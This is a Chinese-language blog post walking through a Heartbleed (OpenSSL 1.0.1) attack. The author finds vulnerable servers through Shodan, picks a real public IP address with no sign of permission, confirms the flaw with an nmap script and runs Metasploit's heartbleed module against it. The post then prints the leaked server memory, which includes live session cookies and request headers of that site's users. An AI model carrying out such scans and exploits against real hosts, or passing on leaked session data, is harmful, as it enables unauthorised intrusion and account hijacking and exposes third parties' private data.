openssl1.0.1滴血漏洞复现 – 作者:抽华子的灰鹿

首先用shadan进行搜索主机
1609941415_5ff5c1a7b37b05e596845.png!small
搜索格式为
openssl 1.0.1a
然后随便找一个请求为200的主机进行漏扫
一、使用专门的工具进行扫描
1609941443_5ff5c1c3ce30b6cfc5a60.png!small
发现这个主机没有可以利用的
我们需要再换一个
149.202.69.214
发现可以有一个可以利用的
1609941455_5ff5c1cfd1f7ea0b646e9.png!small
二、使用nmap工具进行扫描
nmap -sV -p 443 149.202.69.214 –script=ssl-heartbleed.nse
1609941470_5ff5c1de2c5ec6d457fc6.png!small
发现下面给爆出了漏洞编号
漏洞发现完成之后,我们就该利用了
打开我们的msf
然后搜索关于xinzang滴血的模块
search heartbleed
1609941479_5ff5c1e78c8e0a632c7c8.png!small
我们选择第一个进入
use auxiliary/scanner/ssl/openssl_heartbleed
1609941496_5ff5c1f820595c894a1cb.png!small
再查看一下需要设置的模块
1609941501_5ff5c1fdb688e27c6638b.png!small
set rhosts 443 149.202.69.214 port 他给出了,不再设置 set VERBOSE true
run一下,发现获取很多敏感信息
1609941528_5ff5c2185aace2a408dee.png!small
……_.;…….E….xZ813on…….!….f…..”.!.9.8………5………………………..3.2…..E.D…../…A…………………………………9.:.;.<.=.>[email protected]…………………………………………………………………………………………………………………………………………………………………………….. .!.”.#.$.%.&.’.(.).*.+.,.-…/.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>[email protected].[.\.].^._.`.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.|.}.~………………………………………………………………………………………..I………..4.2……………………………………………#…….j.i.g…P.}.6.Q.P.M.I.E.A.>.9.3.2.0.+………………………N=BiOh3qKRuCQh7K45G9Tq; EXP=-1%40%21%400%40%21%40….3….O.”^.j….z…..40%21%400%40%21%40…….}..&I..Z?’ j.22%2C%22valid%22%3A1%7D%7D; SESSION=BiOh3qKRuCQh7K45G9Tq; EXP=-1%40%21%400%40%21%40….].`<.g….$_…’……………………………………………………………………………………………………………………. repeated 2613 times …………………………………………………………………………………………………………………….8…8……..`……………………………………………………………………………………………………………………. repeated 12195 times …………………………………………………………………………………………………………………….@……………………………………………………………………………………………………………………. repeated 16122 times …………………………………………………………………………………………………………………….@……………………………………………………………………………………………………………………. repeated 1087 times …………………………………………………………………………………………………………………….pN…………..GET /img4web///EXP_000273//IMG_006344_01R.jpg HTTP/1.1..Host: 149.202.69.214..Connection: keep-alive..User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36..Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8..Sec-Fetch-Site: same-origin..Sec-Fetch-Mode: no-cors..Sec-Fetch-Dest: image..Referer: https://149.202.69.214/sis4web/home3.php..Accept-Encoding: gzip, deflate, br..Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7….eW.R…%…|…Fr%22%3A1%2C%22idExp%22%3A255%2C%22mode%22%3A1%2C%22naming%22%3A%220%22%2C%22scale%22%3A0%2C%22type%22%3A3%2C%22base%22%3A%22%22%2C%22src%22%3A%22%22%2C%22eltSrc%22%3A%22%22%2C%22images%22%3A%22%22%2C%22min16%22%3A%220%22%2C%22max16%22%3A%220%22%2C%22valid%22%3A1%7D%7D; SESSION=BiOh3qKRuCQh7K45G9Tq; EXP=-1%40%21%400%40%21%40……Y..7J/z/..H.. N29.>.#m..R..$..<G..}….g…40….D)…}.!…..e..; SESSION=BiOh3qKRuCQh7K45G9Tq; EXP=-1%40%21%400%40%21%40…..,.W…16..g.)……………………………………………………………………………………………………………………. repeated 5365 times …………………………………………………………………………………………………………………….K………..8…8…. ……………………………………………………………………………………………………………………. repeated 8103 times …………………………………………………………………………………………………………………….@……………………………………………………………………………………………………………………. repeated 16103 times ………………………………………………………………………………………………..

来源:freebuf.com 2021-01-06 22:00:31 by: 抽华子的灰鹿

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论